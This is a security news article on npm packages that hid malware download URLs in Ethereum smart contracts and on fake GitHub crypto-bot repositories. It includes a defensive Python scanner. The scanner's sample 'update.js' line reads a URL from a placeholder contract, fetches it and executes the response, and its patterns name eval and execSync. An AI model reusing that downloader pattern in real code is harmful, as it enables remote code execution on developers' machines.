A new malicious campaign has been uncovered targeting developers through npm packages and GitHub repositories, leveraging an unusual tactic: hiding command-and-control (C2) infrastructure inside Ethereum smart contracts.
The operation was first detected in early July, when ReversingLabs researcher Karlo Zanki identified a suspicious package called “colortoolsv2” published on npm. Although the package was quickly removed, attackers tried to continue the campaign by uploading a near-identical clone named “mimelib2.” Both packages used blockchain mechanisms to deliver a second-stage malware payload.
A Novel Evasion Technique
While malicious npm downloaders are not new, they typically embed malicious URLs or scripts directly in the package code. In this case, however, the attackers used Ethereum smart contracts to host and distribute the URLs for retrieving the malware.
This method makes detection significantly harder: the malicious URL lives in on-chain contract data rather than in the package files, so scanning the package alone does not reveal where the second stage is fetched from.
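As an added illustration of the kind of triage check a package-assessment pipeline could run (example code written for this page, not ReversingLabs' tooling or the campaign's code), the script below flags npm source files that read from an Ethereum contract and also fetch remote content or execute code dynamically. The indicator patterns and the sample package contents are constructed assumptions, not signatures taken from colortoolsv2 or mimelib2.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Indicator patterns are assumptions for this example, not signatures taken
# from the colortoolsv2/mimelib2 packages.
CHAIN_READ = re.compile(r"\b(ethers|web3|eth_call|\.Contract\s*\()", re.I)
REMOTE_FETCH = re.compile(r"\b(fetch|axios(\.\w+)?|https?\.(get|request))\s*\(", re.I)
DYNAMIC_EXEC = re.compile(
    r"\b(eval|new Function|child_process|execSync|spawnSync|vm\.runInThisContext)\b"
)
CHAIN_REASON = "reads from Ethereum contract or RPC"

@dataclass
class Finding:
    path: str
    reasons: List[str] = field(default_factory=list)

def score_file(path: str, text: str) -> Optional[Finding]:
    """Flag a file only when it reads from an Ethereum contract AND also fetches
    remote content or executes code dynamically. A chain read alone is normal
    for a dapp; the combination inside a colour/MIME utility is not."""
    reasons = []
    if CHAIN_READ.search(text):
        reasons.append(CHAIN_REASON)
    if REMOTE_FETCH.search(text):
        reasons.append("fetches remote content")
    if DYNAMIC_EXEC.search(text):
        reasons.append("dynamic code execution")
    if reasons[:1] == [CHAIN_REASON] and len(reasons) > 1:
        return Finding(path, reasons)
    return None

def scan_package(files: Dict[str, str]) -> List[Finding]:
    """files maps a path inside the unpacked tarball to its source text."""
    return [f for p, t in sorted(files.items()) if (f := score_file(p, t))]

# Constructed sample package contents (placeholder address), not real malware.
SAMPLE_PACKAGE = {
    "lib/colors.js": "module.exports = { hex: (r, g, b) => '#' + [r, g, b].map(x => x.toString(16)).join('') };\n",
    "lib/price.js": "const { ethers } = require('ethers');\n"
                    "async function price(c) { return (await c.latestAnswer()).toString(); }\n",
    "lib/update.js": "const { ethers } = require('ethers');\n"
                     "const { execSync } = require('child_process');\n"
                     "const c = new ethers.Contract('0x<placeholder>', ['function u() view returns (string)'], p);\n"
                     "c.u().then(async u => { const r = await fetch(u); execSync(await r.text()); });\n",
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        print(f.path, "->", "; ".join(f.reasons))
```

The benign `price.js` reads a contract but is not flagged, which keeps the heuristic usable on genuine dapp helpers; a real pipeline would run this over the unpacked tarball rather than an in-memory dict.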
“Downloaders appear weekly, but this use of smart contracts to load malicious commands is something we haven’t seen before,” ReversingLabs researchers explained.
“It demonstrates how quickly adversaries are adapting their evasion strategies while exploiting open-source repositories and developers.”
Fake GitHub Repositories Masquerading as Crypto Tools
The investigation also revealed that the npm packages were tied to a larger GitHub campaign. Threat actors created fake repositories disguised as cryptocurrency trading bots, which appeared legitimate with thousands of commits, multiple maintainers, and active watchers.
However, much of this activity was fabricated:
- Stars and watchers came from accounts created only in July with almost no history.
- Puppet accounts posed as maintainers to boost credibility.
- Commits and forks were artificially inflated to give the illusion of popularity.
One prominent example was a repository named “solana-trading-bot-v2,” which bundled the malicious npm package. Although it looked like a genuine project, closer inspection exposed the fabricated activity designed to trick developers.
Expanding Threat Landscape for Open Source
This discovery adds to the growing number of software supply chain attacks targeting crypto-related development projects.
ReversingLabs’ 2025 Software Supply Chain Security report noted 23 similar campaigns in 2024, including the compromise of the PyPI package ultralytics in December, which was manipulated to deliver a coin miner.
These incidents highlight the increasing sophistication of attackers, who now combine open-source manipulation with blockchain-based evasion techniques.
ReversingLabs researchers emphasize that developers must:
- Rigorously vet libraries, packages, and maintainers
- Avoid relying solely on surface-level metrics such as stars, commits, or downloads
- Adopt stronger package assessment tools to safeguard projects and digital assets
The report concludes that only increased vigilance and proactive defenses can mitigate the risks of evolving supply chain threats.
Source: https://www.infosecurity-magazine.com/news/malicious-npm-packages-exploit